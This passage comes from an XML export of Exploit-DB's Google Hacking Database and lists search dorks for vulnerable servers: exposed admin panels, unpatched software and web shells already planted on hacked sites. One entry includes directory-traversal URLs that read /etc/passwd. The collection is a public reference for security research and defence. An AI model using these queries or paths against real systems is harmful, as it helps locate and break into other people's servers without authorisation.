<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;AT-admin.cgi&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Mohammed Arif H</author>
</entry>
<entry>
<id>6229</id>
<link>https://www.exploit-db.com/ghdb/6229</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;index of&quot; &quot;filemail.pl&quot;</shortDescription>
<textualDescription>Author: Mohammed Arif H
Dork: intitle:&quot;index of&quot; &quot;filemail.pl&quot;
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;filemail.pl&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;filemail.pl&quot;</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Mohammed Arif H</author>
</entry>
<entry>
<id>6233</id>
<link>https://www.exploit-db.com/ghdb/6233</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;index of&quot; &quot;shell.php&quot;</shortDescription>
<textualDescription>This dork will give you all the server which are affected by shells.
Dork: intitle:&quot;index of&quot; &quot;shell.php&quot;
Author: Hemant Patidar (HemantSolo)
Linkedin: https://www.linkedin.com/in/hemantsolo/
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;shell.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;shell.php&quot;</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Hemant Patidar</author>
</entry>
<entry>
<id>753</id>
<link>https://www.exploit-db.com/ghdb/753</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Mail Server CMailServer Webmail&quot; &quot;5.2&quot;</shortDescription>
<textualDescription>CMailServer is a small mail webmail server. Multiple vulnerabilities were found, including buffer overflow, SQL Injection and XXS.http://www.securiteam.com/windowsntfocus/6E00M2KBPS.html</textualDescription>
<query>intitle:&quot;Mail Server CMailServer Webmail&quot; &quot;5.2&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Mail+Server+CMailServer+Webmail%22+%225.2%22</querystring>
<edb></edb>
<date>2004-12-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>1336</id>
<link>https://www.exploit-db.com/ghdb/1336</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;MvBlog powered&quot;</shortDescription>
<textualDescription>MvBlog is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.The application is prone to HTML-injection and SQL-injection vulnerabilities. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. Arbitrary script code may also be executed in the browser of an unsuspecting user in the context of the affected site; this may help the attacker steal cookie-based authentication credentials and launch other attacks.http://www.securityfocus.com/bid/17481/discuss</textualDescription>
<query>intitle:&quot;MvBlog powered&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22MvBlog+powered%22&amp;btnG=H%C4%BEada%C5%A5&amp;meta=&amp;num=100</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>118</id>
<link>https://www.exploit-db.com/ghdb/118</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Remote Desktop Web Connection&quot;</shortDescription>
<textualDescription>Microsoft Remote Desktop Connection Web Connection pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to an otherwise inaccessible machine.</textualDescription>
<query>intitle:&quot;Remote Desktop Web Connection&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Remote+Desktop+Web+Connection%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>202</id>
<link>https://www.exploit-db.com/ghdb/202</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Samba Web Administration Tool&quot; intext:&quot;Help Workgroup&quot;</shortDescription>
<textualDescription>This search reveals wide-open samba web adminitration servers. Attackers can change options on the server.</textualDescription>
<query>intitle:&quot;Samba Web Administration Tool&quot; intext:&quot;Help Workgroup&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Samba+Web+Administration+Tool%22+intext%3A%22Help+Workgroup%22</querystring>
<edb></edb>
<date>2004-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>117</id>
<link>https://www.exploit-db.com/ghdb/117</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Terminal Services Web Connection&quot;</shortDescription>
<textualDescription>Microsoft Terminal Services Web Connector pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to a &quot;protected&quot; machine.</textualDescription>
<query>intitle:&quot;Terminal Services Web Connection&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Terminal+Services+Web+Connection%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>7296</id>
<link>https://www.exploit-db.com/ghdb/7296</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;TileServer GL - Server for vector and raster maps with GL styles&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;TileServer GL - Server for vector and raster maps with GL styles&quot;
# Vulnerable Servers
# Date:07/07/2021
# Exploit Author: Jan-Jaap Korpershoek</textualDescription>
<query>intitle:&quot;TileServer GL - Server for vector and raster maps with GL styles&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;TileServer GL - Server for vector and raster maps with GL styles&quot;</querystring>
<edb></edb>
<date>2021-09-24</date>
<author>Jan-Jaap Korpershoek</author>
</entry>
<entry>
<id>1352</id>
<link>https://www.exploit-db.com/ghdb/1352</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Uploader - Uploader v6&quot; -pixloads.com</shortDescription>
<textualDescription>File upload servers, dangerous if used in couple with mytrashmail.com</textualDescription>
<query>intitle:&quot;Uploader - Uploader v6&quot; -pixloads.com</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Uploader+-+Uploader+v6%22+-pixloads.com</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6584</id>
<link>https://www.exploit-db.com/ghdb/6584</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Vulnerability Report&quot; &quot;Critical&quot; ext:pdf</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Vulnerability Report&quot; &quot;Critical&quot; ext:pdf
# Vulnerability Reports.
# Date: 30/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Vulnerability Report&quot; &quot;Critical&quot; ext:pdf</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Vulnerability Report&quot; &quot;Critical&quot; ext:pdf</querystring>
<edb></edb>
<date>2020-10-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6419</id>
<link>https://www.exploit-db.com/ghdb/6419</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;Wing FTP Server - Web&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Wing FTP Server - Web&quot;
# Wing FTP Server 6.2.5 - Privilege Escalation. This dork is linked to the
# following existing exploit: https://www.exploit-db.com/exploits/48154
# Date: 15/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Wing FTP Server - Web&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Wing FTP Server - Web&quot;</querystring>
<edb></edb>
<date>2020-07-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3703</id>
<link>https://www.exploit-db.com/ghdb/3703</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:&quot;[EasyPHP] - Administration&quot;</shortDescription>
<textualDescription>Unprotected EasyPHP Admin page detection.. Author: Aneesh Dogra (lionaneesh)</textualDescription>
<query>intitle:&quot;[EasyPHP] - Administration&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;[EasyPHP] - Administration&quot;</querystring>
<edb></edb>
<date>2011-03-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>3745</id>
<link>https://www.exploit-db.com/ghdb/3745</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:#k4raeL - sh3LL</shortDescription>
<textualDescription>intitle:#k4raeL - sh3LL
Finds K4rael Shell , though many of them are dead but we can get some and
even cache data can get you information , making website vulnerable
Author: cyb3r.pr3dat0r</textualDescription>
<query>intitle:#k4raeL - sh3LL</query>
<querystring>https://www.google.com/search?q=intitle%3A%23k4raeL+-+sh3LL</querystring>
<edb></edb>
<date>2011-10-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>3781</id>
<link>https://www.exploit-db.com/ghdb/3781</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:awen+intitle:asp.net</shortDescription>
<textualDescription>Hi,
This google dork exposes any already uploaded asp.net shells which are
available in BackTrack.
http://www.google.com/search?q=intitle:awen+intitle:asp.net
Thanks,
Sagar Belure</textualDescription>
<query>intitle:awen+intitle:asp.net</query>
<querystring>https://www.google.com/search?q=intitle:awen+intitle:asp.net</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3690</id>
<link>https://www.exploit-db.com/ghdb/3690</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:cyber anarchy shell</shortDescription>
<textualDescription>Submitter: eXeSoul cyber anarchy shell</textualDescription>
<query>intitle:cyber anarchy shell</query>
<querystring>https://www.google.com/search?q=intitle:cyber anarchy shell</querystring>
<edb></edb>
<date>2011-02-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3716</id>
<link>https://www.exploit-db.com/ghdb/3716</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:Locus7shell intext:&quot;Software:&quot;</shortDescription>
<textualDescription>intitle:Locus7shell intext:&quot;Software:&quot;
Submitted by lionaneesh
--
Thanks
Aneesh Dogra (lionaneesh)</textualDescription>
<query>intitle:Locus7shell intext:&quot;Software:&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Locus7shell intext:&quot;Software:&quot;</querystring>
<edb></edb>
<date>2011-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>3735</id>
<link>https://www.exploit-db.com/ghdb/3735</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:m1n1 1.01</shortDescription>
<textualDescription>find the b374k shell....
Submitted by : biLLbud
</textualDescription>
<query>intitle:m1n1 1.01</query>
<querystring>https://www.google.com/search?q=intitle:m1n1 1.01</querystring>
<edb></edb>
<date>2011-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>103</id>
<link>https://www.exploit-db.com/ghdb/103</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:osCommerce inurl:admin intext:&quot;redistributable under the GNU&quot;intext:&quot;Online Catalog&quot; -demo -site:oscommerce.com</shortDescription>
<textualDescription>This is a decent way to explore the admin interface of osCommerce e-commerce sites. Depending on how bad the setup of the web store is, web surfers can even Google their way into customer details and order status, all from the Google cache.</textualDescription>
<query>intitle:osCommerce inurl:admin intext:&quot;redistributable under the GNU&quot;intext:&quot;Online Catalog&quot; -demo -site:oscommerce.com</query>
<querystring>https://www.google.com/search?q=intitle:osCommerce+inurl:admin+intext:%22redistributable+under+the+GNU%22intext:%22Online+Catalog%22+-demo+-site:oscommerce.com</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>448</id>
<link>https://www.exploit-db.com/ghdb/448</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:phpMyAdmin &quot;Welcome to phpMyAdmin ***&quot; &quot;running on * as root@*&quot;</shortDescription>
<textualDescription>search for phpMyAdmin installations that are configured to run the MySQL database with root priviledges.</textualDescription>
<query>intitle:phpMyAdmin &quot;Welcome to phpMyAdmin ***&quot; &quot;running on * as root@*&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22</querystring>
<edb></edb>
<date>2004-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>639</id>
<link>https://www.exploit-db.com/ghdb/639</link>
<category>Vulnerable Servers</category>
<shortDescription>intitle:phpMyAdmin &quot;Welcome to phpMyAdmin ***&quot; &quot;running on * as root@*&quot;</shortDescription>
<textualDescription>phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fieldsThe servers found here can be acessed without authentication. This search is restricted to NON-ROOT users! See ID 510 for a root user search.</textualDescription>
<query>intitle:phpMyAdmin &quot;Welcome to phpMyAdmin ***&quot; &quot;running on * as root@*&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22&amp;start=0</querystring>
<edb></edb>
<date>2004-10-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>7010</id>
<link>https://www.exploit-db.com/ghdb/7010</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl /editor/filemanager/connectors/uploadtest.html</shortDescription>
<textualDescription># Google Dork: inurl /editor/filemanager/connectors/uploadtest.html
# CKEditor 3 - Server-Side Request Forgery (SSRF).
https://www.exploit-db.com/exploits/50021
# Date: 18/6/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl /editor/filemanager/connectors/uploadtest.html</query>
<querystring>https://www.google.com/search?q=inurl /editor/filemanager/connectors/uploadtest.html</querystring>
<edb></edb>
<date>2021-06-25</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8216</id>
<link>https://www.exploit-db.com/ghdb/8216</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:&quot;/geoserver/ows?service=wfs&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/geoserver/ows?service=wfs&quot;
# Vulnerable Servers
# Date: 04/07/2023
# Author: Bipin Jitiya</textualDescription>
<query>inurl:&quot;/geoserver/ows?service=wfs&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/geoserver/ows?service=wfs&quot;</querystring>
<edb></edb>
<date>2023-07-04</date>
<author>Bipin Jitiya</author>
</entry>
<entry>
<id>833</id>
<link>https://www.exploit-db.com/ghdb/833</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:&quot;/NSearch/AdminServlet&quot;</shortDescription>
<textualDescription>This search brings up results for Novell NetWare's Web Search Manager.. at best the sites will be password protected, at worst the site will require no authentication - allowing full control over a site's 'virtual search servers'.</textualDescription>
<query>inurl:&quot;/NSearch/AdminServlet&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22/NSearch/AdminServlet%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-01-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>3932</id>
<link>https://www.exploit-db.com/ghdb/3932</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:&quot;/reports/rwservlet&quot; intext:&quot;Oracle&quot;</shortDescription>
<textualDescription>Search Oracle Reports likely vulnerable to DB user/password disclosure
(CVE-2012-3152
and CVE-2012-3153)
--
Felipe Molina</textualDescription>
<query>inurl:&quot;/reports/rwservlet&quot; intext:&quot;Oracle&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/reports/rwservlet&quot; intext:&quot;Oracle&quot;</querystring>
<edb></edb>
<date>2014-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>387</id>
<link>https://www.exploit-db.com/ghdb/387</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:&quot;index.php? module=ew_filemanager&quot;</shortDescription>
<textualDescription>http://www.cirt.net/advisories/ew_file_manager.shtml:Product: EasyWeb FileManager Module - http://home.postnuke.ru/index.phpDescription: EasyWeb FileManager Module for PostNuke is vulnerable to a directory traversal problem which allows retrieval of arbitrary files from the remote system. Systems Affected: EasyWeb FileManager 1.0 RC-1Technical Description: The PostNuke module works by loading a directory and/or file via the &quot;pathext&quot; (directory) and &quot;view&quot; (file) variables. Providing a relative path (from the document repository) in the &quot;pathext&quot; variable will cause FileManager to provide a directory listing of that diretory. Selecting a file in that listing, or putting a file name in the &quot;view&quot; variable, will cause EasyWeb to load the file specified. Only files and directories which can be read by the system user running PHP can be retrieved.Assuming PostNuke is installed at the root level:/etc directory listing:/index.php?module=ew_filemanager&amp;type=admin&amp;func=manager&amp;pathext=../../../etc/etc/passwd file:/index.php?module=ew_filemanager&amp;type=admin&amp;func=manager&amp;pathext=../../../etc/&amp;view=passwdFix/Workaround:Use another file manager module for PostNuke, as the authors do not appear to bemaintaining EW FileManager.Vendor Status: Vendor was contacted but did not respond.Credir: Sullo - cirt.netNOTE: mitigating factor, an attacker needs to be registred and logged on to have access rights to this module.</textualDescription>
<query>inurl:&quot;index.php?module=ew_filemanager&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22index.php%3Fmodule%3Dew_filemanager%22</querystring>
<edb></edb>
<date>2004-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4818</id>
<link>https://www.exploit-db.com/ghdb/4818</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:&quot;q=user/password&quot;</shortDescription>
<textualDescription>for finding drupal </textualDescription>
<query>inurl:&quot;q=user/password&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;q=user/password&quot;</querystring>
<edb></edb>
<date>2018-05-16</date>
<author>Ebad uddin Ahmad</author>
</entry>
<entry>
<id>3902</id>
<link>https://www.exploit-db.com/ghdb/3902</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:&quot;struts&quot; filetype:action</shortDescription>
<textualDescription>Google search for actoin files wich could be explotable via CVE-2013-2251
&quot;Multiple Remote Command Execution Vulnerabilities in Apache Struts&quot;</textualDescription>
<query>inurl:&quot;struts&quot; filetype:action</query>
<querystring>https://www.google.com/search?q=inurl:&quot;struts&quot; filetype:action</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3766</id>
<link>https://www.exploit-db.com/ghdb/3766</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]</shortDescription>
<textualDescription>This search attempts to find the BOFF 1.0 Shell. Author: alsa7r</textualDescription>
<query>inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]</query>
<querystring>https://www.google.com/search?q=inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]</querystring>
<edb></edb>
<date>2011-12-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>3862</id>
<link>https://www.exploit-db.com/ghdb/3862</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin</shortDescription>
<textualDescription>inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin
view phpMyAdmin of web sites
Author: Un0wn_X
Follow: @UnownSec
E-Mail: unownsec@gmail.com</textualDescription>
<query>inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin</query>
<querystring>https://www.google.com/search?q=inurl:.php? intext:CHARACTER_SETS,COLLATIONS, ?intitle:phpmyadmin</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6225</id>
<link>https://www.exploit-db.com/ghdb/6225</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:/+CSCOE+/logon.html</shortDescription>
<textualDescription># Dork: inurl:/+CSCOE+/logon.html
# Author: Simgamsetti Manikanta
# Date: 2020-06-04</textualDescription>
<query>inurl:/+CSCOE+/logon.html</query>
<querystring>https://www.google.com/search?q=inurl:/+CSCOE+/logon.html</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Simgamsetti Manikanta</author>
</entry>
<entry>
<id>3980</id>
<link>https://www.exploit-db.com/ghdb/3980</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:/elfinder/elfinder.html+intitle:&quot;elFinder 2.0&quot; </shortDescription>
<textualDescription>Upload Vulnerability Elfinder 2.0
inurl:/elfinder/elfinder.html+intitle:&quot;elFinder 2.0&quot; </textualDescription>
<query>inurl:/elfinder/elfinder.html+intitle:&quot;elFinder 2.0&quot; </query>
<querystring>https://www.google.com/search?q=inurl:/elfinder/elfinder.html+intitle:&quot;elFinder 2.0&quot; </querystring>
<edb></edb>
<date>2014-12-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4556</id>
<link>https://www.exploit-db.com/ghdb/4556</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:/proc/self/cwd</shortDescription>
<textualDescription># Google Dork: inurl:/proc/self/cwd
Vulnerable web servers that have either been misconfigured or compromised in
some manner already, allow appending &quot;/proc/self/cwd/&quot; with the path of
local server files. This could be from an LFI on an insecure PHP script like
file=/proc/self/cwd/some/path/to/file, or directly in the URL path of the
site like somesite.com/proc/self/cwd/some/exposed/stuff/here
- digip</textualDescription>
<query>inurl:/proc/self/cwd</query>
<querystring>https://www.google.com/search?q=inurl:/proc/self/cwd</querystring>
<edb></edb>
<date>2017-07-24</date>
<author>DigiP</author>
</entry>
<entry>
<id>3642</id>
<link>https://www.exploit-db.com/ghdb/3642</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:/vb/install/install.php</shortDescription>
<textualDescription>Vbulletin installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations. Author: ScOrPiOn</textualDescription>
<query>inurl:/vb/install/install.php</query>
<querystring>https://www.google.com/search?q=inurl:/vb/install/install.php</querystring>
<edb></edb>
<date>2010-12-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3643</id>
<link>https://www.exploit-db.com/ghdb/3643</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:/vb/install/upgrade.php</shortDescription>
<textualDescription>Vbulletin custom updrade wizards. Author: ScOrPiOn</textualDescription>
<query>inurl:/vb/install/upgrade.php</query>
<querystring>https://www.google.com/search?q=inurl:/vb/install/upgrade.php</querystring>
<edb></edb>
<date>2010-12-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3827</id>
<link>https://www.exploit-db.com/ghdb/3827</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:/wp-content/w3tc/dbcache/</shortDescription>
<textualDescription>- Jay Townsend</textualDescription>
<query>inurl:/wp-content/w3tc/dbcache/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/w3tc/dbcache/</querystring>
<edb></edb>
<date>2012-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>7782</id>
<link>https://www.exploit-db.com/ghdb/7782</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:adm/login.jsp.bak</shortDescription>
<textualDescription># Google Dork: intitle:&quot;R WebServer&quot;
# Vulnerable Server
# Date: 12/11/2021
# Exploit Author: Md Anzaruddin</textualDescription>
<query>inurl:adm/login.jsp.bak</query>
<querystring>https://www.google.com/search?q=inurl:adm/login.jsp.bak</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Md Anzaruddin</author>
</entry>
<entry>
<id>652</id>
<link>https://www.exploit-db.com/ghdb/652</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:aol*/_do/rss_popup?blogID=</shortDescription>
<textualDescription>AOL Journals BlogID Incrementing Discloses Account Names and Email AddressesAOL Journals is basically &quot;America Online's version of a blog (weblog) for AOL members/subscribers. A vulnerability in AOL Journals BlogID allows an attacker to numbers provided to the program and enumerate a list of AOL members/subscribers and their corresponding email.</textualDescription>
<query>inurl:aol*/_do/rss_popup?blogID=</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=inurl%3Aaol*%2F_do%2Frss_popup%3FblogID%3D</querystring>
<edb></edb>
<date>2004-11-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3971</id>
<link>https://www.exploit-db.com/ghdb/3971</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:CHANGELOG.txt intext:drupal intext:&quot;SA-CORE&quot; -intext:7.32 -site:github.com -site:drupal.org</shortDescription>
<textualDescription>inurl:CHANGELOG.txt intext:drupal intext:&quot;SA-CORE&quot; -intext:7.32 -site:github.com -site:drupal.org
look for a CHANGELOG.txt file that has drupal and SA-CORE in the text, but not the latest 7.32 patch. Ignore github and drupal.org
</textualDescription>
<query>inurl:CHANGELOG.txt intext:drupal intext:&quot;SA-CORE&quot; -intext:7.32 -site:github.com -site:drupal.org</query>
<querystring>https://www.google.com/search?q=inurl:CHANGELOG.txt intext:drupal intext:&quot;SA-CORE&quot; -intext:7.32 -site:github.com -site:drupal.org</querystring>
<edb></edb>
<date>2014-11-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>121</id>
<link>https://www.exploit-db.com/ghdb/121</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:footer.inc.php</shortDescription>
<textualDescription>From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server.</textualDescription>
<query>inurl:footer.inc.php</query>
<querystring>https://www.google.com/search?q=inurl%3Afooter.inc.php</querystring>
<edb></edb>
<date>2004-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>1437</id>
<link>https://www.exploit-db.com/ghdb/1437</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:index.php?pagedb=rss -Vulnerability -inurl</shortDescription>
<textualDescription>CVE: 2007-4007
EDB-ID: 4221
This google dork possibly exposes sites with the Article Directory (index.php page) Remote File Inclusion Vulnerability</textualDescription>
<query>http://www.google.com/search?q=inurl%3Aindex.php%3Fpagedb%3Drss</query>
<querystring>https://www.google.com/search?q=inurl%3Aindex.php%3Fpagedb%3Drss</querystring>
<edb></edb>
<date>2010-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>122</id>
<link>https://www.exploit-db.com/ghdb/122</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:info.inc.php</shortDescription>
<textualDescription>From http://www.securityfocus.com/bid/9664, the AllMyPHP family of products (Versions 0.1.2 - 0.4) contains several potential vulnerabilities, som elalowing an attacker to execute malicious code on the web server.</textualDescription>
<query>inurl:info.inc.php</query>
<querystring>https://www.google.com/search?q=inurl%3Ainfo.inc.php</querystring>
<edb></edb>
<date>2004-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>116</id>
<link>https://www.exploit-db.com/ghdb/116</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:ManyServers.htm</shortDescription>
<textualDescription>Microsoft Terminal Services Multiple Clients pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely.</textualDescription>
<query>inurl:ManyServers.htm</query>
<querystring>https://www.google.com/search?q=inurl%3Amanyservers.htm</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>654</id>
<link>https://www.exploit-db.com/ghdb/654</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:newsdesk.cgi? inurl:&quot;t=&quot;</shortDescription>
<textualDescription>Newsdesk is a cgi script designed to allow remote administration of website news headlines.Due to a failure in the sanitization of parameters a remote user can reveal the contents of any file. This allows the attacker to download user and password data.It is furthermore known that it is possible to run system commands remotely.</textualDescription>
<query>inurl:newsdesk.cgi? inurl:&quot;t=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:newsdesk.cgi%3F+inurl:%22t%3D%22&amp;c2coff=1&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3752</id>
<link>https://www.exploit-db.com/ghdb/3752</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:php intitle:&quot;Cpanel , FTP CraCkeR&quot;</shortDescription>
<textualDescription>locates cpanel and ftp cracker. Author: alsa7r</textualDescription>
<query>inurl:php intitle:&quot;Cpanel , FTP CraCkeR&quot;</query>
<querystring>https://www.google.com/search?q=inurl:php intitle:&quot;Cpanel , FTP CraCkeR&quot;</querystring>
<edb></edb>
<date>2011-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>190</id>
<link>https://www.exploit-db.com/ghdb/190</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:pls/admin_/gateway.htm</shortDescription>
<textualDescription>This is a default login portal used by Oracle. In addition to the fact that this file can be used to footprint a web server and determine it's version and software, this page has been targeted in many vulnerability reports as being a source of an SQL injection vulnerability. This problem, when exploited can lead to unauthorized privileges to the databse. In addition, this page may allow unauthorized modification of parameters on the server.</textualDescription>
<query>inurl:pls/admin_/gateway.htm</query>
<querystring>https://www.google.com/search?q=inurl%3Apls%2Fadmin_%2Fgateway.htm+</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6671</id>
<link>https://www.exploit-db.com/ghdb/6671</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:RichWidgets/Popup_Upload.aspx</shortDescription>
<textualDescription># Google Dork: inurl:RichWidgets/Popup_Upload.aspx
# Date: 2020-11-11
# Author: Bryan Rodriguez Martin
# This search returns endpoints where files can be uploaded without authentication.
</textualDescription>
<query>inurl:RichWidgets/Popup_Upload.aspx</query>
<querystring>https://www.google.com/search?q=inurl:RichWidgets/Popup_Upload.aspx</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Bryan Rodriguez Martin</author>
</entry>
<entry>
<id>3972</id>
<link>https://www.exploit-db.com/ghdb/3972</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com</shortDescription>
